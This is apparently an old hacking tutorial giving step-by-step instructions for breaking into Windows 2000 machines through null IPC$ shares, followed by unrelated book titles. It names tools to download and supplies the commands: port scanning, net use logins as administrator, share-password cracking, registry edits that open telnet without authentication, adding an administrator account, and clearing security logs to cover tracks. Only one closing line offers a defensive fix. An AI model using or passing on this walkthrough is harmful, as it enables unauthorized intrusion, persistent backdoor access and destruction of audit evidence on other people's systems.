+++++++++++++++ 1. A port scanner like Superscan v3.0. 2. NetBrute scanner. 3. PQWak v1.0 share name password cracker. __________________________________________________ ___________________________ ->1. Download Superscan from Astalavista ( www.astalavista.com/hacking/win/super scan.exe ). ->2. Get Netbrute scanner from ( www.astalavista.com/hacking/win/nbrute10.zip ). ->3. Do the same with PQWak v1.0 ( www.astalavista.com/hacking/win/PQwak.exe ). __________________________________________________ ___________________________ ->Lets begin 1.Open SuperScan and select an ip range. Check "Only scan responsive pings" and "All selected ports in list". Then, scan only Netbios(139) and Network Blackjack(1025). When both Netbios and Blackjack is found open Netbrute and scan that ip to see if there is an IPC$. 2.After you found that there is an IPC$ on the remote system open the command pr ompt and type in: C:\>net use \\ipaddress\ipc$ " /user:administrator " When you connect to the system, it will print: C:\>net use \\ipaddress\ipc$ " /user:administrator " The command was completed successfully. If it says "bad username or password" try running PQWAK.exe to crack the share n ame password. Then insert the password like so: C:\>net use \\ipaddress\ipc$ "password" /user:administrator Try the c$ share pass as the administrator password to connect to the IPC$. 3.As you are connected, open Computer Management. Click "Action", then "Connect to Another Computer" and type in the ip address. 4.Then, go to the command prompt ( Start>Run.. ) and open "regedit". Connect to the following registry key "HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0->NTLM" . Set the value data from (2) to (1). That will enable login to the telnet server without being connected to the IPC$ or a trusted domain. 5.Go back to Computer Management and click "Services and Applications" and then "Services". Right click on the Telnet Service and open properties. Set the service to automa tic and start the service. 6.Go to the command prompt ( Start>Run.. ) and write : telnet < ipaddress > If it asks you to type a username and password, type Administrator with no passw ord. You might want to create a user account. If you want, type in the command prompt : C:\>net user username password/add To add a user account to a domain, write : C:\>net group administrators username /add 7.The last thing is to cover your tracks. To do this write in the command prompt : C:\>net use \\ipaddress\ipc$ /delete Then as you are connected go to Computer Management and check if the security lo gs are being audited in "Event Viewer".If there are, clear them. A solution to protect your W2k system from this attack is to connect to the foll owing registry key : "HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous ", and change the the value data from (0) to (1). Doing this, will disable remote logon to a null IPC$. You can also install a firewall ( www.zonealarm.com ).
Windows 11 for Beginners: The Complete Step-by-Step User Guide to Learn and Take Full Use of Windows 11 (A Windows 11 Manual with Useful Tips & Tricks)
Music Production for Beginners: How to Make Professional Electronic Dance Music, The Ultimate 3 in 1 Bundle for Producers (Synthesizer Explained, The Ultimate Melody Guide & Mixing EDM Music)
Kali Linux - An Ethical Hacker's Cookbook - Second Edition: Practical recipes that combine strategies, attacks, and tools for advanced penetration testing, 2nd Edition